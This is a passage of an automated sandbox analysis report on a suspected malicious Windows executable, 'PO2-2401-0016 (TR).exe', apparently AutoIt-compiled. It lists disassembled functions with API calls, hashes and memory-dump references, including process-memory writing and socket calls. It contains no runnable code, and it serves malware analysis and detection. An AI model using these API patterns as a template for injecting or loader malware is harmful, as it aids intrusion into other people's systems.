                                • Opcode Fuzzy Hash: 4983f00e7595060a01d7321fc2dc210ae95114eae5681df88db95a08c6e502d4
                                • Instruction Fuzzy Hash: 94F03632944314AB8622FB68F9C6C5677EDBB547187A64C05F048D7541CB34FD808F64
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 001B5C58
                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 001B5C6F
                                • MessageBeep.USER32(00000000), ref: 001B5C87
                                • KillTimer.USER32(?,0000040A), ref: 001B5CA3
                                • EndDialog.USER32(?,00000001), ref: 001B5CBD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                • String ID:
                                • API String ID: 3741023627-0
                                • Opcode ID: 61c168d5ba03c7aaabecb895d54a4a86fcd26dc61b36cba3664dd5106a27d5e0
                                • Instruction ID: e3dcab7e899e61fb01312033fd6db4893d599fc4163af640aded9e4908bcc629
                                • Opcode Fuzzy Hash: 61c168d5ba03c7aaabecb895d54a4a86fcd26dc61b36cba3664dd5106a27d5e0
                                • Instruction Fuzzy Hash: 61018130500B44ABEB245B50DD8EFEA7BBEBB04B05F000559E583A55E1DBF0A9898BD0
                                APIs
                                • _free.LIBCMT ref: 001822BE
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 001822D0
                                • _free.LIBCMT ref: 001822E3
                                • _free.LIBCMT ref: 001822F4
                                • _free.LIBCMT ref: 00182305
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 2253b49d67bf9e44c06f505277f11ad871e710050b80465cff6056c6cfb44e0a
                                • Instruction ID: 107266f03a7132f327449c6597ddb6fe465b9aa4763c1166d01daab8b524b9b5
                                • Opcode Fuzzy Hash: 2253b49d67bf9e44c06f505277f11ad871e710050b80465cff6056c6cfb44e0a
                                • Instruction Fuzzy Hash: 3CF030B4880130AB8623BFD4BC498483B65B7387507122606F814D3272CF3416639FA4
                                APIs
                                • EndPath.GDI32(?), ref: 001695D4
                                • StrokeAndFillPath.GDI32(?,?,001A71F7,00000000,?,?,?), ref: 001695F0
                                • SelectObject.GDI32(?,00000000), ref: 00169603
                                • DeleteObject.GDI32 ref: 00169616
                                • StrokePath.GDI32(?), ref: 00169631
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                • String ID:
                                • API String ID: 2625713937-0
                                • Opcode ID: de59e9464d4e1be9db61c502809dd9f6839b8909dedc0c1e2b735deb374f4970
                                • Instruction ID: 4c524640da1133d827d86fe88e92990ec3bcc0cd4ca179ec3a1cad6367edb3fb
                                • Opcode Fuzzy Hash: de59e9464d4e1be9db61c502809dd9f6839b8909dedc0c1e2b735deb374f4970
                                • Instruction Fuzzy Hash: B2F0C9350053C8EBDB265FA9ED5CB683B65AB11322F049214F465594F0C73089F7DF60
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: __freea$_free
                                • String ID: a/p$am/pm
                                • API String ID: 3432400110-3206640213
                                • Opcode ID: 162ae20fbf80fe996205bb6fa14d8d49e0f359ea18329e70d1903acecf63fb78
                                • Instruction ID: 6a427964ef79f1e446761cf10dcdfe939daafe30cd2ebca6cab6a48620859363
                                • Opcode Fuzzy Hash: 162ae20fbf80fe996205bb6fa14d8d49e0f359ea18329e70d1903acecf63fb78
                                • Instruction Fuzzy Hash: BED10433900206EACB28BF68C845BFAB7B9FF16710F294159E9059B650D3759F82CF51
                                APIs
                                  • Part of subcall function 00170242: EnterCriticalSection.KERNEL32(0022070C,00221884,?,?,0016198B,00222518,?,?,?,001512F9,00000000), ref: 0017024D
                                  • Part of subcall function 00170242: LeaveCriticalSection.KERNEL32(0022070C,?,0016198B,00222518,?,?,?,001512F9,00000000), ref: 0017028A
                                  • Part of subcall function 001700A3: __onexit.LIBCMT ref: 001700A9
                                • __Init_thread_footer.LIBCMT ref: 001D6238
                                  • Part of subcall function 001701F8: EnterCriticalSection.KERNEL32(0022070C,?,?,00168747,00222514), ref: 00170202
                                  • Part of subcall function 001701F8: LeaveCriticalSection.KERNEL32(0022070C,?,00168747,00222514), ref: 00170235
                                  • Part of subcall function 001C359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001C35E4
                                  • Part of subcall function 001C359C: LoadStringW.USER32(00222390,?,00000FFF,?), ref: 001C360A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                • String ID: x#"$x#"$x#"
                                • API String ID: 1072379062-2717048500
                                • Opcode ID: c1b0d11d938caecbb6b12a2d6c1228134ae33c9d6c59a267ab590595a0f2fdd2
                                • Instruction ID: bfa7aa91f0c1e63cc613c375ecdcdee27f9cb44ede8b36ed7d4e646dc2912c9d
                                • Opcode Fuzzy Hash: c1b0d11d938caecbb6b12a2d6c1228134ae33c9d6c59a267ab590595a0f2fdd2
                                • Instruction Fuzzy Hash: 31C16A71A00205AFCB14DF98D891EBEB7B9EF58340F10816AF915AB391DB70E985CB90
                                APIs
                                  • Part of subcall function 00170242: EnterCriticalSection.KERNEL32(0022070C,00221884,?,?,0016198B,00222518,?,?,?,001512F9,00000000), ref: 0017024D
                                  • Part of subcall function 00170242: LeaveCriticalSection.KERNEL32(0022070C,?,0016198B,00222518,?,?,?,001512F9,00000000), ref: 0017028A
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001700A3: __onexit.LIBCMT ref: 001700A9
                                • __Init_thread_footer.LIBCMT ref: 001D7BFB
                                  • Part of subcall function 001701F8: EnterCriticalSection.KERNEL32(0022070C,?,?,00168747,00222514), ref: 00170202
                                  • Part of subcall function 001701F8: LeaveCriticalSection.KERNEL32(0022070C,?,00168747,00222514), ref: 00170235
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                • String ID: 5$G$Variable must be of type 'Object'.
                                • API String ID: 535116098-3733170431
                                • Opcode ID: 81216e97563e770b0cacdac0b8d425ae43eef962cb006afcc9b9c33f58501b3a
                                • Instruction ID: 2bb7329ad05a93c68b79b5e72f6bb6aacdf846d9924152d66c3431f61775a775
                                • Opcode Fuzzy Hash: 81216e97563e770b0cacdac0b8d425ae43eef962cb006afcc9b9c33f58501b3a
                                • Instruction Fuzzy Hash: 3A918B71A04609EFCB14EF94D891DADB7B2FF59300F50805AF806AB392EB71AE45CB51
                                APIs
                                  • Part of subcall function 001BB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001B21D0,?,?,00000034,00000800,?,00000034), ref: 001BB42D
                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001B2760
                                  • Part of subcall function 001BB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001B21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 001BB3F8
                                  • Part of subcall function 001BB32A: GetWindowThreadProcessId.USER32(?,?), ref: 001BB355
                                  • Part of subcall function 001BB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001B2194,00000034,?,?,00001004,00000000,00000000), ref: 001BB365
                                  • Part of subcall function 001BB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001B2194,00000034,?,?,00001004,00000000,00000000), ref: 001BB37B
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001B27CD
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001B281A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                • String ID: @
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO2-2401-0016 (TR).exe,00000104), ref: 00181769
                                • _free.LIBCMT ref: 00181834
                                • _free.LIBCMT ref: 0018183E
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe
                                APIs
                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001BC306
                                • DeleteMenu.USER32(?,00000007,00000000), ref: 001BC34C
                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00221990,00E16D80), ref: 001BC395
                                Similarity
                                • API ID: Menu$Delete$InfoItem
                                • String ID: 0
                                APIs
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001ECC08,00000000,?,?,?,?), ref: 001E44AA
                                • GetWindowLongW.USER32 ref: 001E44C7
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001E44D7
                                Similarity
                                • API ID: Window$Long
                                • String ID: SysTreeView32
                                APIs
                                  • Part of subcall function 001D335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,001D3077,?,?), ref: 001D3378
                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001D307A
                                • _wcslen.LIBCMT ref: 001D309B
                                • htons.WSOCK32(00000000,?,?,00000000), ref: 001D3106
                                Similarity
                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                • String ID: 255.255.255.255
                                APIs
                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001E4705
                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001E4713
                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001E471A
                                Similarity
                                • API ID: MessageSend$DestroyWindow
                                • String ID: msctls_updown32
                                Similarity
                                • API ID: _wcslen
                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                APIs
                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001E3840
                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001E3850
                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001E3876
                                Similarity
                                • API ID: MessageSend$MoveWindow
                                • String ID: Listbox
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 001C4A08
                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001C4A5C
                                • SetErrorMode.KERNEL32(00000000,?,?,001ECC08), ref: 001C4AD0
                                Similarity
                                • API ID: ErrorMode$InformationVolume
                                • String ID: %lu
                                APIs
                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001E424F
                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001E4264
                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001E4271
                                Similarity
                                • API ID: MessageSend
                                • String ID: msctls_trackbar32
                                APIs
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                  • Part of subcall function 001B2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001B2DC5
                                  • Part of subcall function 001B2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B2DD6
                                  • Part of subcall function 001B2DA7: GetCurrentThreadId.KERNEL32 ref: 001B2DDD
                                  • Part of subcall function 001B2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001B2DE4
                                • GetFocus.USER32 ref: 001B2F78
                                  • Part of subcall function 001B2DEE: GetParent.USER32(00000000), ref: 001B2DF9
                                • GetClassNameW.USER32(?,?,00000100), ref: 001B2FC3
                                • EnumChildWindows.USER32(?,001B303B), ref: 001B2FEB
                                Similarity
                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                • String ID: %s%d
                                APIs
                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001E58C1
                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001E58EE
                                • DrawMenuBar.USER32(?), ref: 001E58FD
                                Similarity
                                • API ID: Menu$InfoItem$Draw
                                • String ID: 0
                                APIs
                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 001AD3BF
                                • FreeLibrary.KERNEL32 ref: 001AD3E5
                                Similarity
                                • API ID: AddressFreeLibraryProc
                                • String ID: GetSystemWow64DirectoryW$X64
                                Similarity
                                • API ID: Variant$ClearInitInitializeUninitialize
                                APIs
                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001EFC08,?), ref: 001B05F0
                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001EFC08,?), ref: 001B0608
                                • CLSIDFromProgID.OLE32(?,?,00000000,001ECC40,000000FF,?,00000000,00000800,00000000,?,001EFC08,?), ref: 001B062D
                                • _memcmp.LIBVCRUNTIME ref: 001B064E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FromProg$FreeTask_memcmp
                                • String ID:
                                • API String ID: 314563124-0
                                • Opcode ID: 228ce35680434a1cd5918676e3822a2dd4220a4df71b777d3281d910ec8ea6fe
                                • Instruction ID: e39592b26319df60fdc9b23054b8e0f4436dd13f782a0ead90e763e7c9cc0fb0
                                • Opcode Fuzzy Hash: 228ce35680434a1cd5918676e3822a2dd4220a4df71b777d3281d910ec8ea6fe
                                • Instruction Fuzzy Hash: 53810971A00209EFCB05DF98C984EEEB7B9FF89315F204558E516EB250DB71AE46CB60
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: d19c58542035b89ec82fb8ae987c8fb0d57feb8534b5642bd6f4274a760b994c
                                • Instruction ID: bb03df5c9737b60ce2ec77978f155002fe242829ef646c085acb5c293937fe60
                                • Opcode Fuzzy Hash: d19c58542035b89ec82fb8ae987c8fb0d57feb8534b5642bd6f4274a760b994c
                                • Instruction Fuzzy Hash: B4414731A00102BBDF257BF89C466BE3AB4FF69370F254225F81897192E73489C18762
                                APIs
                                • GetWindowRect.USER32(00E1FB68,?), ref: 001E62E2
                                • ScreenToClient.USER32(?,?), ref: 001E6315
                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001E6382
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ClientMoveRectScreen
                                • String ID:
                                • API String ID: 3880355969-0
                                • Opcode ID: 8b681f46cfa9fff5615ef6bea497bbac3969f2a407c1632820a731b0ba257b3d
                                • Instruction ID: 15959797951c1ad14625715ee0d381cd75643190966e0d75b73b29a7f73d56c2
                                • Opcode Fuzzy Hash: 8b681f46cfa9fff5615ef6bea497bbac3969f2a407c1632820a731b0ba257b3d
                                • Instruction Fuzzy Hash: BF516274900685EFCF10DF55D8849AE7BB6FF653A0F508159F9159B290D730ED81CB90
                                APIs
                                • socket.WSOCK32(00000002,00000002,00000011), ref: 001D1AFD
                                • WSAGetLastError.WSOCK32 ref: 001D1B0B
                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001D1B8A
                                • WSAGetLastError.WSOCK32 ref: 001D1B94
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$socket
                                • String ID:
                                • API String ID: 1881357543-0
                                • Opcode ID: 882fd889794751b86f880626c1f64a85ddf3807fb70bab3d8b8ec18415d88373
                                • Instruction ID: dc9e653a9dbf206e6a483291d1a077dc99d5ca9fe0ebd34a7cc33a2bfb1aca87
                                • Opcode Fuzzy Hash: 882fd889794751b86f880626c1f64a85ddf3807fb70bab3d8b8ec18415d88373
                                • Instruction Fuzzy Hash: B041A034600200BFE720AF24D886F2A77E5AB58718F54845DF96A9F7D2D772ED42CB90
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7e1381281c8f8686ab8de43496ab58c45e9420f108623c2a2f6f954c5b532fe
                                • Instruction ID: f2e776e55a859074d6a0b3395ef26b1f5ccc7a646f84079ab6d2fdb41c2dc6b4
                                • Opcode Fuzzy Hash: b7e1381281c8f8686ab8de43496ab58c45e9420f108623c2a2f6f954c5b532fe
                                • Instruction Fuzzy Hash: 60412B72A04304BFD725AF38CC82B6B7BE9EB94710F10452EF546DB292D3719A418B90
                                APIs
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001C5783
                                • GetLastError.KERNEL32(?,00000000), ref: 001C57A9
                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001C57CE
                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001C57FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateHardLink$DeleteErrorFileLast
                                • String ID:
                                • API String ID: 3321077145-0
                                • Opcode ID: 30d101164f9f194c94368aeefd8349b2dd5f9df86e0b44b440dcdd8d9c743948
                                • Instruction ID: 733dc6b9b03cdf19e4a0c0efbcba7eb371cf318c280a8343bf32ded21fccd3d1
                                • Opcode Fuzzy Hash: 30d101164f9f194c94368aeefd8349b2dd5f9df86e0b44b440dcdd8d9c743948
                                • Instruction Fuzzy Hash: 74415D39600610DFCB10DF55D485A5EBBE2EF99321B198488EC5AAF3A2DB30FD45CB91
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00176D71,00000000,00000000,001782D9,?,001782D9,?,00000001,00176D71,8BE85006,00000001,001782D9,001782D9), ref: 0018D910
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0018D999
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0018D9AB
                                • __freea.LIBCMT ref: 0018D9B4
                                  • Part of subcall function 00183820: RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                • String ID:
                                • API String ID: 2652629310-0
                                • Opcode ID: 3e76ae07e1325d50afdaa2586979d84d27a519f733d59ce19434bdb47ceb0573
                                • Instruction ID: fd4bb9f7dea0009ab7939417fff7d172ac2bddd42fa3f90be23e9203136373e1
                                • Opcode Fuzzy Hash: 3e76ae07e1325d50afdaa2586979d84d27a519f733d59ce19434bdb47ceb0573
                                • Instruction Fuzzy Hash: B731D272A0021AABDF25AF65EC41EAE7BA5EB41714F054168FC08D7190EB35CE51CB90
                                APIs
                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 001E5352
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E5375
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001E5382
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001E53A8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
